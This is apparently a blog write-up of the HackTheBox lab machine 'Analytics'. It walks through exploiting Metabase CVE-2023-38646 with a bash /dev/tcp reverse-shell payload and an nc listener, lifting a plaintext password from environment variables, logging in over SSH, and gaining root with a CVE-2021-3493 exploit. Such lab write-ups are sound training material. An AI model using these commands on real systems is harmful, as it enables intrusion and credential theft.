HackTheBox "Analytics"

December 5th, 2023

Introduction

Analytics is an easy box released on October 7th, 2023 by 7u9y and TheCyberGeek.

User Own

An Nmap scan reveals a website at analytical.htb:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 11:30 EST
Nmap scan report for analytical.htb (10.10.11.233)
Host is up (0.049s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.89 seconds

The website has a login page which goes to the data.analytical.htb subdomain. This login page is using Metabase. A quick search for Metabase exploits gives us CVE-2023-38646. A GitHub repository demonstrating this CVE can be used to gain a reverse shell.

Exploit Shell

┌──(root㉿kali)-[~/metabase-pre-auth-rce-poc]
└─# python3 main.py -u http://data.analytical.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c "bash -i >& /dev/tcp/10.10.xx.xx/1234 0>&1"
[!] BE SURE TO BE LISTENING ON THE PORT YOU DEFINED IF YOU ARE ISSUING AN COMMAND TO GET REVERSE SHELL [!]

[+] Initialized script
[+] Encoding command
[+] Making request
[+] Payload sent

Reverse Shell

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.11.233] 57882
bash: cannot set terminal process group (1): Not a tty
bash: no job control in this shell
461dbc5d4e86:/$ whoami
whoami
metabase
461dbc5d4e86:/$

This reverse shell logs in as metabase. Doing a quick check of env reveals a plaintext password:

env

SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=461dbc5d4e86
LANGUAGE=en_US:en
MB_JETTY_HOST=0.0.0.0
JAVA_HOME=/opt/java/openjdk
MB_DB_FILE=//metabase.db/metabase.db
PWD=/
LOGNAME=metabase
MB_EMAIL_SMTP_USERNAME=
HOME=/home/metabase
LANG=en_US.UTF-8
META_USER=metalytics
META_PASS=An4lytics_ds20223#
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
SHLVL=4
MB_DB_USER=
FC_LANG=en-US
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
LC_CTYPE=en_US.UTF-8
MB_LDAP_BIND_DN=
LC_ALL=en_US.UTF-8
MB_LDAP_PASSWORD=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_CONNECTION_URI=
JAVA_VERSION=jdk-11.0.19+7
_=/usr/bin/env

The META_USER and META_PASS credentials can be used to login to the machine through SSH:

┌──(root㉿kali)-[~/metabase-pre-auth-rce-poc]
└─# ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-25-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Dec  5 04:59:04 PM UTC 2023

  System load:              0.0615234375
  Usage of /:               93.8% of 7.78GB
  Memory usage:             30%
  Swap usage:               0%
  Processes:                162
  Users logged in:          0
  IPv4 address for docker0: 172.17.0.1
  IPv4 address for eth0:    10.10.11.233
  IPv6 address for eth0:    dead:beef::250:56ff:feb9:bc1e

  => / is using 93.8% of 7.78GB


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Dec  5 16:57:32 2023 from 10.10.xx.xx
metalytics@analytics:~$ ls
user.txt

System Own

The system is running Ubuntu 22.04.3 LTS, which is vulnerable to CVE-2021-3493. Running this exploit on the machine will grant root access.

┌──(kali㉿kali)-[~]
└─$ scp exploit.o [email protected]:/tmp
[email protected]'s password: 
exploit.o                                  100%   17KB 114.9KB/s   00:00

metalytics@analytics:/tmp$ ./exploit.o 
bash-5.1# whoami
root
bash-5.1# ls /root
root.txt

And that's the box!

PreviousMain Page NextKeep Your Domains

Last updated 2 years ago